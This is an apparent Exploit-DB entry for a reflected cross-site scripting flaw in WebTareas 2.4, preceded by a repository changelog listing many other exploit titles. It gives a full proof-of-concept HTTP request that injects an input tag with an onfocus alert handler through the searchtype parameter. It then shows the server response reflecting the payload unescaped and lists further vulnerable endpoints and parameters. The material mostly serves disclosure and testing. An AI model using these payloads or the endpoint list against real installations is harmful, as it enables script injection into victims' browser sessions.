b137003172
36 changes to exploits/shellcodes/ghdb MiniDVBLinux 5.4 - Change Root Password MiniDVBLinux 5.4 - Remote Root Command Injection MiniDVBLinux 5.4 - Arbitrary File Read MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) MiniDVBLinux <=5.4 - Config Download Exploit Desktop Central 9.1.0 - Multiple Vulnerabilities FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Aero CMS v0.0.1 - PHP Code Injection (auth) Aero CMS v0.0.1 - SQL Injection (no auth) Atom CMS v2.0 - SQL Injection (no auth) Canteen-Management v1.0 - SQL Injection Canteen-Management v1.0 - XSS-Reflected Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) WebTareas 2.4 - RCE (Authorized) WebTareas 2.4 - Reflected XSS (Unauthorised) WebTareas 2.4 - SQL Injection (Unauthorised) WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Grafana <=6.2.4 - HTML Injection Hex Workshop v6.7 - Buffer overflow DoS Scdbg 1.0 - Buffer overflow DoS Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) AVS Audio Converter 10.3 - Stack Overflow (SEH) Explorer32++ v1.3.5.531 - Buffer overflow Frhed (Free hex editor) v1.6.0 - Buffer overflow Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path Resource Hacker v3.6.0.92 - Buffer overflow Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
61 lines
No EOL
3.2 KiB
Text
61 lines
No EOL
3.2 KiB
Text
# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)
|
|
# Date: 15/10/2022
|
|
# Exploit Author: Hubert Wojciechowski
|
|
# Contact Author: hub.woj12345@gmail.com
|
|
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
|
|
# Software Link: https://sourceforge.net/projects/webtareas/
|
|
# Version: 2.4
|
|
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
|
|
|
## Proof Of Concept
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Param: searchtype
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Req
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Origin: http://127.0.0.1
|
|
Connection: close
|
|
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple
|
|
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Res:
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 15 Oct 2022 07:46:31 GMT
|
|
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
|
|
X-Powered-By: PHP/7.4.30
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate
|
|
Pragma: no-cache
|
|
X-XSS-Protection: 1; mode=block
|
|
X-Frame-Options: SAMEORIGIN
|
|
X-Content-Type-Options: nosniff
|
|
Connection: close
|
|
Content-Type: text/html; charset=UTF-8
|
|
Content-Length: 11147
|
|
[...]
|
|
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">
|
|
[...]
|
|
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
Other vulnerable url and params:
|
|
-----------------------------------------------------------------------------------------------------------------------
|
|
/webtareas/administration/print_layout.php [doc_type]
|
|
/webtareas/general/login.php [logout]
|
|
/webtareas/general/login.php [session]
|
|
/webtareas/general/newnotifications.php [msg]
|
|
/webtareas/general/search.php [searchtype]
|
|
/webtareas/administration/print_layout.php [doc_type] |